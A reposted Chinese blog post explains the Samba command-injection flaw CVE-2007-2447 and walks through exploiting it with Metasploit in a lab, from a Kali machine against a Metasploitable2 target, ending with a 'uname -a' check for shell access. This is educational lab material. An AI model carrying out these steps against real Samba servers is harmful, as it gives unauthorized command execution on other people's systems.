码迷,mamicode.com
首页 > 系统相关 > 详细

Samba远程Shell命令注入执行漏洞

时间:2019-10-09 17:44:04      阅读:193      评论:0      收藏:0      [点我收藏+]

标签:sam   spl   bin   asp   图片   远程   kali   mic   samba   

CVE:CVE-2007-2447

原理:

Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令。

?

漏洞利用:

攻击机 kali
IP 192.168.129.133

靶机 Metasploitable2
IP 192.168.129.128

?

msf中搜索samba

技术图片

use 13 选择漏洞

技术图片

show options 查看选项

技术图片

set RHOSTS 设置要攻击的ip

技术图片

exploit 开始攻击

技术图片

之后uname -a验证

?

Samba远程Shell命令注入执行漏洞

标签:sam   spl   bin   asp   图片   远程   kali   mic   samba   

原文地址:https://www.cnblogs.com/qxxaq/p/11642911.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!